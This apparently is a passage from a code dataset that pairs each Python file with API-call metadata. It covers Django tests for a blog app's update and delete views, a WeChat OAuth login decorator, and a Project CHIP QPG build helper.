response = self.client.get(reverse(self.url_name, args=['test_blog']))
self.assertTemplateUsed(response, '404.html')
def test_can_update_blog(self):
user = self.create_and_log_in_user()
Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
self.assertEqual(Blog.objects.all().count(), 1)
response = self.client.post(reverse(self.url_name, args=['test_blog']), {
'title': 'Test blog updated',
'description': 'Updated'},
follow=True)
self.assertEqual(Blog.objects.all().count(), 1)
blog = Blog.objects.all()[0]
self.assertEqual(blog.title, 'Test blog updated')
self.assertEqual(blog.description, 'Updated')
self.assertTemplateUsed(response, 'plok/blog_detail.html')
self.assertEqual(response.context['blog'].title, 'Test blog updated')
self.assertEqual(response.context['blog'].description, 'Updated')
def test_cant_update_blog_if_not_logged_in(self):
creator = auth.get_user_model().objects.create(username='creator')
Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
response = self.client.post(reverse(self.url_name, args=['test_blog']), {
'title': 'Test blog updated',
'description': 'Updated'},
follow=True)
blog = Blog.objects.all()[0]
self.assertEqual(blog.title, 'Test blog')
self.assertEqual(blog.description, 'Testing')
self.assertTemplateUsed(response, 'account/login.html')
# self.assertTemplateUsed(response, 'registration/login.html')
def test_cant_update_blog_if_not_creator(self):
creator = auth.get_user_model().objects.create(username='creator')
Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
self.create_and_log_in_user()
response = self.client.post(reverse(self.url_name, args=['test_blog']), {
'title': 'Test blog updated',
'description': 'Updated'},
follow=True)
self.assertTemplateUsed(response, 'plok/blog_detail.html')
class DeleteBlogPage(ExtTestCase):
url_name = 'plok:blog_delete'
def test_reverse_blog_delete(self):
self.assertEqual(reverse(self.url_name, args=['test_blog']), '/plok/test_blog/delete/')
def test_uses_correct_template(self):
user = self.create_and_log_in_user()
blog = Blog.objects.create(created_by=user, name="test_blog")
response = self.client.get(reverse(self.url_name, args=[blog.name]))
self.assertTemplateUsed(response, 'plok/blog_confirm_delete.html')
def test_404_no_blog(self):
user = self.create_and_log_in_user()
response = self.client.get(reverse(self.url_name, args=['test_blog']))
self.assertTemplateUsed(response, '404.html')
def test_can_delete_blog(self):
user = self.create_and_log_in_user()
Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
self.assertEqual(Blog.objects.all().count(), 1)
response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
self.assertEqual(Blog.objects.all().count(), 0)
def test_cant_delete_blog_if_not_logged_in(self):
creator = auth.get_user_model().objects.create(username='creator')
Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
# self.assertTemplateUsed(response, 'registration/login.html')
self.assertTemplateUsed(response, 'account/login.html')
def test_cant_delete_blog_if_not_creator(self):
creator = auth.get_user_model().objects.create(username='creator')
Blog.objects.create(created_by=creator, name="test_blog", title="Test blog", description="Testing")
user = self.create_and_log_in_user()
self.assertEqual(Blog.objects.all().count(), 1)
response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
self.assertEqual(Blog.objects.all().count(), 1)
self.assertTemplateUsed(response, '404.html')
def test_cant_delete_blog_if_blog_has_articles(self):
user = self.create_and_log_in_user()
blog = Blog.objects.create(created_by=user, name="test_blog", title="Test blog", description="Testing")
article = Article.objects.create(created_by=user, blog=blog, name="test_article", title="Test article")
self.assertEqual(Blog.objects.all().count(), 1)
self.assertEqual(Article.objects.all().count(), 1)
response = self.client.post(reverse(self.url_name, args=['test_blog']), {}, follow=True)
self.assertEqual(Blog.objects.all().count(), 1)
self.assertEqual(Article.objects.all().count(), 1)
self.assertTemplateUsed(response, '404.html')
| [
"plok.models.Blog.objects.create",
"django.contrib.auth.get_user_model",
"plok.models.Article.objects.create",
"plok.models.Article.objects.all",
"plok.models.Blog.objects.all",
"django.urls.reverse"
] | [((688, 773), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog_1"""', 'title': '"""Test blog 1"""'}), "(created_by=creator, name='test_blog_1', title='Test blog 1'\n )\n", (707, 773), False, 'from plok.models import Blog, Article\n'), ((785, 870), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog_2"""', 'title': '"""Test blog 2"""'}), "(created_by=creator, name='test_blog_2', title='Test blog 2'\n )\n", (804, 870), False, 'from plok.models import Blog, Article\n'), ((1740, 1797), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""'}), "(created_by=creator, name='test_blog')\n", (1759, 1797), False, 'from plok.models import Blog, Article\n'), ((2070, 2127), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""'}), "(created_by=creator, name='test_blog')\n", (2089, 2127), False, 'from plok.models import Blog, Article\n'), ((2347, 2423), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (2366, 2423), False, 'from plok.models import Blog, Article\n'), ((3120, 3196), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3139, 3196), False, 'from plok.models import Blog, Article\n'), ((3472, 3548), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3491, 3548), False, 'from plok.models import Blog, Article\n'), ((3852, 3928), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=creator, name='test_blog', title='Test blog')\n", (3871, 3928), False, 'from plok.models import Blog, Article\n'), ((3947, 4047), 'plok.models.Article.objects.create', 'Article.objects.create', ([], {'blog': 'blog', 'name': '"""test_article"""', 'title': '"""Test article"""', 'created_by': 'creator'}), "(blog=blog, name='test_article', title='Test article',\n created_by=creator)\n", (3969, 4047), False, 'from plok.models import Blog, Article\n'), ((5914, 5987), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""'}), "(created_by=user, name='test_blog', title='Test blog')\n", (5933, 5987), False, 'from plok.models import Blog, Article\n'), ((6874, 6928), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""'}), "(created_by=user, name='test_blog')\n", (6893, 6928), False, 'from plok.models import Blog, Article\n'), ((7365, 7465), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (7384, 7465), False, 'from plok.models import Blog, Article\n'), ((8292, 8395), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (8311, 8395), False, 'from plok.models import Blog, Article\n'), ((9064, 9167), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (9083, 9167), False, 'from plok.models import Blog, Article\n'), ((9840, 9894), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""'}), "(created_by=user, name='test_blog')\n", (9859, 9894), False, 'from plok.models import Blog, Article\n'), ((10348, 10448), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (10367, 10448), False, 'from plok.models import Blog, Article\n'), ((10792, 10895), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (10811, 10895), False, 'from plok.models import Blog, Article\n'), ((11260, 11363), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'creator', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=creator, name='test_blog', title='Test blog',\n description='Testing')\n", (11279, 11363), False, 'from plok.models import Blog, Article\n'), ((11787, 11887), 'plok.models.Blog.objects.create', 'Blog.objects.create', ([], {'created_by': 'user', 'name': '"""test_blog"""', 'title': '"""Test blog"""', 'description': '"""Testing"""'}), "(created_by=user, name='test_blog', title='Test blog',\n description='Testing')\n", (11806, 11887), False, 'from plok.models import Blog, Article\n'), ((11902, 11999), 'plok.models.Article.objects.create', 'Article.objects.create', ([], {'created_by': 'user', 'blog': 'blog', 'name': '"""test_article"""', 'title': '"""Test article"""'}), "(created_by=user, blog=blog, name='test_article',\n title='Test article')\n", (11924, 11999), False, 'from plok.models import Blog, Article\n'), ((359, 381), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (366, 381), False, 'from django.urls import reverse\n'), ((471, 493), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (478, 493), False, 'from django.urls import reverse\n'), ((901, 923), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (908, 923), False, 'from django.urls import reverse\n'), ((1543, 1585), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (1550, 1585), False, 'from django.urls import reverse\n'), ((1833, 1873), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (1840, 1873), False, 'from django.urls import reverse\n'), ((2178, 2218), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (2185, 2218), False, 'from django.urls import reverse\n'), ((2459, 2499), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (2466, 2499), False, 'from django.urls import reverse\n'), ((2884, 2926), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (2891, 2926), False, 'from django.urls import reverse\n'), ((3232, 3272), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (3239, 3272), False, 'from django.urls import reverse\n'), ((3622, 3662), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (3629, 3662), False, 'from django.urls import reverse\n'), ((4079, 4119), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (4086, 4119), False, 'from django.urls import reverse\n'), ((4405, 4427), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4412, 4427), False, 'from django.urls import reverse\n'), ((4557, 4579), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4564, 4579), False, 'from django.urls import reverse\n'), ((4831, 4853), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (4838, 4853), False, 'from django.urls import reverse\n'), ((5155, 5177), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (5162, 5177), False, 'from django.urls import reverse\n'), ((5703, 5725), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (5710, 5725), False, 'from django.urls import reverse\n'), ((6168, 6190), 'django.urls.reverse', 'reverse', (['self.url_name'], {}), '(self.url_name)\n', (6175, 6190), False, 'from django.urls import reverse\n'), ((6700, 6742), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (6707, 6742), False, 'from django.urls import reverse\n'), ((6964, 7004), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (6971, 7004), False, 'from django.urls import reverse\n'), ((7177, 7219), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (7184, 7219), False, 'from django.urls import reverse\n'), ((7554, 7596), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (7561, 7596), False, 'from django.urls import reverse\n'), ((7801, 7819), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7817, 7819), False, 'from plok.models import Blog, Article\n'), ((8428, 8470), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (8435, 8470), False, 'from django.urls import reverse\n'), ((8667, 8685), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (8683, 8685), False, 'from plok.models import Blog, Article\n'), ((9238, 9280), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (9245, 9280), False, 'from django.urls import reverse\n'), ((9666, 9708), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (9673, 9708), False, 'from django.urls import reverse\n'), ((9930, 9970), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': '[blog.name]'}), '(self.url_name, args=[blog.name])\n', (9937, 9970), False, 'from django.urls import reverse\n'), ((10160, 10202), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10167, 10202), False, 'from django.urls import reverse\n'), ((10537, 10579), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10544, 10579), False, 'from django.urls import reverse\n'), ((10928, 10970), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (10935, 10970), False, 'from django.urls import reverse\n'), ((11497, 11539), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (11504, 11539), False, 'from django.urls import reverse\n'), ((12147, 12189), 'django.urls.reverse', 'reverse', (['self.url_name'], {'args': "['test_blog']"}), "(self.url_name, args=['test_blog'])\n", (12154, 12189), False, 'from django.urls import reverse\n'), ((615, 636), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (634, 636), False, 'from django.contrib import auth\n'), ((1668, 1689), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (1687, 1689), False, 'from django.contrib import auth\n'), ((1998, 2019), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (2017, 2019), False, 'from django.contrib import auth\n'), ((2275, 2296), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (2294, 2296), False, 'from django.contrib import auth\n'), ((3048, 3069), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3067, 3069), False, 'from django.contrib import auth\n'), ((3400, 3421), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3419, 3421), False, 'from django.contrib import auth\n'), ((3780, 3801), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3799, 3801), False, 'from django.contrib import auth\n'), ((5050, 5068), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (5066, 5068), False, 'from plok.models import Blog, Article\n'), ((5365, 5383), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (5381, 5383), False, 'from plok.models import Blog, Article\n'), ((6013, 6031), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (6029, 6031), False, 'from plok.models import Blog, Article\n'), ((6391, 6409), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (6407, 6409), False, 'from plok.models import Blog, Article\n'), ((7487, 7505), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7503, 7505), False, 'from plok.models import Blog, Article\n'), ((7755, 7773), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7771, 7773), False, 'from plok.models import Blog, Article\n'), ((8227, 8248), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (8246, 8248), False, 'from django.contrib import auth\n'), ((8999, 9020), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (9018, 9020), False, 'from django.contrib import auth\n'), ((10470, 10488), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (10486, 10488), False, 'from plok.models import Blog, Article\n'), ((10623, 10641), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (10639, 10641), False, 'from plok.models import Blog, Article\n'), ((10727, 10748), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (10746, 10748), False, 'from django.contrib import auth\n'), ((11195, 11216), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (11214, 11216), False, 'from django.contrib import auth\n'), ((11430, 11448), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (11446, 11448), False, 'from plok.models import Blog, Article\n'), ((11583, 11601), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (11599, 11601), False, 'from plok.models import Blog, Article\n'), ((12021, 12039), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (12037, 12039), False, 'from plok.models import Blog, Article\n'), ((12077, 12098), 'plok.models.Article.objects.all', 'Article.objects.all', ([], {}), '()\n', (12096, 12098), False, 'from plok.models import Blog, Article\n'), ((12233, 12251), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (12249, 12251), False, 'from plok.models import Blog, Article\n'), ((12289, 12310), 'plok.models.Article.objects.all', 'Article.objects.all', ([], {}), '()\n', (12308, 12310), False, 'from plok.models import Blog, Article\n')] |
# -*- coding: utf-8 -*-
"""
Created on 2014-5-14
django 帮助函数
@author: skycrab
@sns_userinfo
def oauth(request):
openid = request.openid
"""
import json
import logging
import base64
from functools import wraps
from django.conf import settings
from django.core.cache import cache
from django.shortcuts import redirect, render_to_response
from django.contrib.auth import login, logout, authenticate
from rest_framework.authtoken.models import Token
from core.redis_number import RedisStat
from django.core.urlresolvers import reverse
from .common import CommonHelper
from wx import class_property, WeixinHelper
from datetime import timedelta
from django.utils import timezone
from shop.models import ShopInfo
from account.models import User
import urllib, urlparse
import time
logger = logging.getLogger('control')
class Helper(CommonHelper):
"""微信具体逻辑帮组类"""
@class_property
def cache(cls):
"""返回cache对象"""
return cache
@class_property
def secret_key(cls):
"""返回cookie加密秘钥"""
return settings.SECRET_KEY
def sns_userinfo_proxy_callback(callback=None):
"""
网页授权获取用户信息装饰器
callback(openid, userinfo):
return user
"""
def wrap(func):
@wraps(func)
def inner(request, *args, **kwargs):
if 'MicroMessenger' in request.META.get('HTTP_USER_AGENT', ''):
shop = request.GET.get('shop', None)
if not shop:
response = func(request, *args, **kwargs)
else:
# 判断支付情况
if request.is_secure():
url = request.build_absolute_uri().replace('https://', 'http://')
return redirect(url)
unionid = request.session.get('unionid', '')
timestamp_now = int(time.time())
ok, unionid = Helper.check_cookie(unionid)
redis = RedisStat()
if ok:
# 判断微信用户token是否存在,如果不存在,则需要授权
redis_info = redis.get(unionid)
if not redis_info:
ok = False
else:
ws = json.loads(redis_info)
if not ws['unionid']:
ok = False
if not ok:
# unionid出错,重新授权
state = request.GET.get('state', None)
if state:
# aa|bb|cc aa:最近一级上级推客 bb:谁转发过来 cc:时间戳
state_list = urllib.unquote(state).split('|')
if len(state_list) != 3:
state = '0|0|%d' % timestamp_now
else:
state = '0|0|%d' % timestamp_now
state += '|%s' % shop
rs_id = redis.get('redirect_url_id')
if rs_id:
url_id = redis.incr('redirect_url_id')
else:
url_id = 1
redis.set('redirect_url_id', url_id)
redis.set_ttl('redirect_url_id_%d' % url_id, request.build_absolute_uri(), 60)
# 跳转到代理微信认证服务器
redirect_url = 'http://%s.control.binli360.com%s' % (shop, reverse('open:proxy_callback'))
scope = 'snsapi_base'
state = 'base|%s|%s' % (state, url_id)
url = WeixinHelper.proxy(redirect_url, scope, state, 'mobile')
return redirect(url)
else:
# 获取绑定的User对象
user = authenticate(unionid=unionid)
if user:
# token, goc = Token.objects.get_or_create(user=user)
login(request, user)
response = func(request, *args, **kwargs)
# response.set_cookie(shop+'_key', token.key, path='/')
response.set_cookie(shop, unionid, path='/')
else:
response = func(request, *args, **kwargs)
else:
response = func(request, *args, **kwargs)
return response
return inner
return wrap
sns_userinfo = sns_userinfo_proxy_callback()
def sns_userinfo_proxy_test_callback(callback=None):
"""
网页授权获取用户信息装饰器
callback(openid, userinfo):
return user
"""
def wrap(func):
@wraps(func)
def inner(request, *args, **kwargs):
if 'MicroMessenger' in request.META.get('HTTP_USER_AGENT', ''):
# logger.debug('sns_userinfo_proxy_test_callback is wechat')
shop = request.GET.get('shop', None)
if not shop:
response = func(request, *args, **kwargs)
else:
# 判断支付情况
if request.is_secure():
url = request.build_absolute_uri().replace('https://', 'http://')
return redirect(url)
unionid = request.session.get('unionid', '')
timestamp_now = int(time.time())
ok, unionid = Helper.check_cookie(unionid)
# logger.debug('sns_userinfo_proxy_test_callback sessino unionid is : %s' % unionid)
redis = RedisStat()
if ok:
# 判断微信用户token是否存在,如果不存在,则需要授权
redis_info = redis.get(unionid)
if not redis_info:
ok = False
else:
ws = json.loads(redis_info)
if not ws['unionid']:
ok = False
if not ok:
# unionid出错,重新授权
state = request.GET.get('state', None)
if state:
# aa|bb|cc aa:最近一级上级推客 bb:谁转发过来 cc:时间戳
state_list = urllib.unquote(state).split('|')
if len(state_list) != 3:
state = '0|0|%d' % timestamp_now
else:
state = '0|0|%d' % timestamp_now
state += '|%s' % shop
rs_id = redis.get('redirect_url_id')
if rs_id:
url_id = redis.incr('redirect_url_id')
else:
url_id = 1
redis.set('redirect_url_id', url_id)
redis.set_ttl('redirect_url_id_%d' % url_id, request.build_absolute_uri(), 60)
# 跳转到代理微信认证服务器
redirect_url = 'http://%s.control.binli360.com%s' % (shop, reverse('open:proxy_callback_test'))
scope = 'snsapi_base'
state = 'base|%s|%s' % (state, url_id)
url = WeixinHelper.proxy(redirect_url, scope, state, 'mobile')
# logger.debug('sns_userinfo_proxy_test_callback redirect_url is %s' % url)
return redirect(url)
else:
# logger.debug('sns_userinfo_proxy_test_callback unionid is : %s' % unionid)
pass
# 获取绑定的User对象
user = authenticate(unionid=unionid)
if user:
# token, goc = Token.objects.get_or_create(user=user)
login(request, user)
response = func(request, *args, **kwargs)
# response.set_cookie(shop+'_key', token.key, path='/')
response.set_cookie(shop, unionid, path='/')
else:
response = func(request, *args, **kwargs)
else:
response = func(request, *args, **kwargs)
return response
return inner
return wrap
sns_userinfo_test = sns_userinfo_proxy_test_callback()
| [
"logging.getLogger",
"django.contrib.auth.authenticate",
"json.loads",
"core.redis_number.RedisStat",
"urllib.unquote",
"wx.WeixinHelper.proxy",
"django.contrib.auth.login",
"functools.wraps",
"django.core.urlresolvers.reverse",
"django.shortcuts.redirect",
"time.time"
] | [((825, 853), 'logging.getLogger', 'logging.getLogger', (['"""control"""'], {}), "('control')\n", (842, 853), False, 'import logging\n'), ((1287, 1298), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (1292, 1298), False, 'from functools import wraps\n'), ((4835, 4846), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (4840, 4846), False, 'from functools import wraps\n'), ((2021, 2032), 'core.redis_number.RedisStat', 'RedisStat', ([], {}), '()\n', (2030, 2032), False, 'from core.redis_number import RedisStat\n'), ((5753, 5764), 'core.redis_number.RedisStat', 'RedisStat', ([], {}), '()\n', (5762, 5764), False, 'from core.redis_number import RedisStat\n'), ((1792, 1805), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (1800, 1805), False, 'from django.shortcuts import redirect, render_to_response\n'), ((1913, 1924), 'time.time', 'time.time', ([], {}), '()\n', (1922, 1924), False, 'import time\n'), ((3729, 3785), 'wx.WeixinHelper.proxy', 'WeixinHelper.proxy', (['redirect_url', 'scope', 'state', '"""mobile"""'], {}), "(redirect_url, scope, state, 'mobile')\n", (3747, 3785), False, 'from wx import class_property, WeixinHelper\n'), ((3818, 3831), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (3826, 3831), False, 'from django.shortcuts import redirect, render_to_response\n'), ((3932, 3961), 'django.contrib.auth.authenticate', 'authenticate', ([], {'unionid': 'unionid'}), '(unionid=unionid)\n', (3944, 3961), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((5418, 5431), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (5426, 5431), False, 'from django.shortcuts import redirect, render_to_response\n'), ((5539, 5550), 'time.time', 'time.time', ([], {}), '()\n', (5548, 5550), False, 'import time\n'), ((7466, 7522), 'wx.WeixinHelper.proxy', 'WeixinHelper.proxy', (['redirect_url', 'scope', 'state', '"""mobile"""'], {}), "(redirect_url, scope, state, 'mobile')\n", (7484, 7522), False, 'from wx import class_property, WeixinHelper\n'), ((7656, 7669), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (7664, 7669), False, 'from django.shortcuts import redirect, render_to_response\n'), ((7900, 7929), 'django.contrib.auth.authenticate', 'authenticate', ([], {'unionid': 'unionid'}), '(unionid=unionid)\n', (7912, 7929), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((2322, 2344), 'json.loads', 'json.loads', (['redis_info'], {}), '(redis_info)\n', (2332, 2344), False, 'import json\n'), ((4108, 4128), 'django.contrib.auth.login', 'login', (['request', 'user'], {}), '(request, user)\n', (4113, 4128), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((6054, 6076), 'json.loads', 'json.loads', (['redis_info'], {}), '(redis_info)\n', (6064, 6076), False, 'import json\n'), ((8076, 8096), 'django.contrib.auth.login', 'login', (['request', 'user'], {}), '(request, user)\n', (8081, 8096), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((3555, 3585), 'django.core.urlresolvers.reverse', 'reverse', (['"""open:proxy_callback"""'], {}), "('open:proxy_callback')\n", (3562, 3585), False, 'from django.core.urlresolvers import reverse\n'), ((7287, 7322), 'django.core.urlresolvers.reverse', 'reverse', (['"""open:proxy_callback_test"""'], {}), "('open:proxy_callback_test')\n", (7294, 7322), False, 'from django.core.urlresolvers import reverse\n'), ((2726, 2747), 'urllib.unquote', 'urllib.unquote', (['state'], {}), '(state)\n', (2740, 2747), False, 'import urllib, urlparse\n'), ((6458, 6479), 'urllib.unquote', 'urllib.unquote', (['state'], {}), '(state)\n', (6472, 6479), False, 'import urllib, urlparse\n')] |
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from enum import Enum, auto
from .gn import GnBuilder
class QpgApp(Enum):
LIGHT = auto()
LOCK = auto()
SHELL = auto()
PERSISTENT_STORAGE = auto()
def ExampleName(self):
if self == QpgApp.LIGHT:
return 'lighting-app'
elif self == QpgApp.LOCK:
return 'lock-app'
elif self == QpgApp.SHELL:
return 'shell'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'persistent-storage'
else:
raise Exception('Unknown app type: %r' % self)
def AppNamePrefix(self):
if self == QpgApp.LIGHT:
return 'chip-qpg6105-lighting-example'
elif self == QpgApp.LOCK:
return 'chip-qpg6105-lock-example'
elif self == QpgApp.SHELL:
return 'chip-qpg6105-shell-example'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'chip-qpg6105-persistent_storage-example'
else:
raise Exception('Unknown app type: %r' % self)
def FlashBundleName(self):
if self == QpgApp.LIGHT:
return 'lighting_app.out.flashbundle.txt'
elif self == QpgApp.LOCK:
return 'lock_app.out.flashbundle.txt'
elif self == QpgApp.SHELL:
return 'shell_app.out.flashbundle.txt'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'persistent_storage_app.out.flashbundle.txt'
else:
raise Exception('Unknown app type: %r' % self)
def BuildRoot(self, root):
return os.path.join(root, 'examples', self.ExampleName(), 'qpg')
class QpgBoard(Enum):
QPG6105 = 1
def GnArgName(self):
if self == QpgBoard.QPG6105:
return 'qpg6105'
else:
raise Exception('Unknown board #: %r' % self)
class QpgBuilder(GnBuilder):
def __init__(self,
root,
runner,
app: QpgApp = QpgApp.LIGHT,
board: QpgBoard = QpgBoard.QPG6105,
enable_rpcs: bool = False):
super(QpgBuilder, self).__init__(
root=app.BuildRoot(root),
runner=runner)
self.app = app
self.board = board
self.enable_rpcs = enable_rpcs
def GnBuildArgs(self):
args = ['qpg_target_ic=\"%s\"' % self.board.GnArgName()]
if self.enable_rpcs:
args.append('import("//with_pw_rpc.gni")')
return args
def build_outputs(self):
items = {}
